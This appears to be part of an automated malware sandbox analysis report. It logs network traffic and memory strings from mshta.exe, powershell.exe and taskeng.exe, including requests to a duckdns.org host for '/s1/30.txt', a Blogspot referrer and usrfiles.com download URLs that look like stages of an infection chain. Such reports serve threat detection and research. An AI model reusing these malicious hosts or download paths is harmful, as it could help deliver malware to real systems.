Source: global trafficHTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /s1/30.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.starinxxxgkular.duckdns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Accept: */*Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /images/errors/robot.png HTTP/1.1Accept: */*Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /s1/30.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.starinxxxgkular.duckdns.orgConnection: Keep-Alive
Source: C:\Windows\System32\mshta.exeDNS query: name: j.mp
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1570Date: Thu, 25 Nov 2021 17:30:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1570Date: Thu, 25 Nov 2021 17:30:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comN equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmpString found in binary or memory: pspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleux"2 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmpString found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.457364588.000000000565F000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BlogPosting
Source: mshta.exe, 00000005.00000002.442223574.0000000004520000.00000002.00020000.sdmp, powershell.exe, 0000000B.00000002.453893933.0000000002390000.00000002.00020000.sdmp, taskeng.exe, 0000000F.00000002.672021301.0000000001BF0000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.499418426.0000000004200000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000005.00000002.442223574.0000000004520000.00000002.00020000.sdmp, powershell.exe, 0000000B.00000002.453893933.0000000002390000.00000002.00020000.sdmp, taskeng.exe, 0000000F.00000002.672021301.0000000001BF0000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.499418426.0000000004200000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 0000000B.00000002.453588226.000000000032F000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: mshta.exe, 00000005.00000003.430602975.00000000002DD000.00000004.00000001.sdmpString found in binary or memory: http://www.starinxxxgkular.duckdns.org/s1/30.txt
Source: mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000005.00000003.439129933.0000000003A3E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439246961.0000000003A4C000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441627561.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://8d3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfil
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.c
Source: mshta.exe, 00000005.00000003.430608858.00000000002D2000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.co4A
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ug
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8d
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_4
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmpString found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/.js
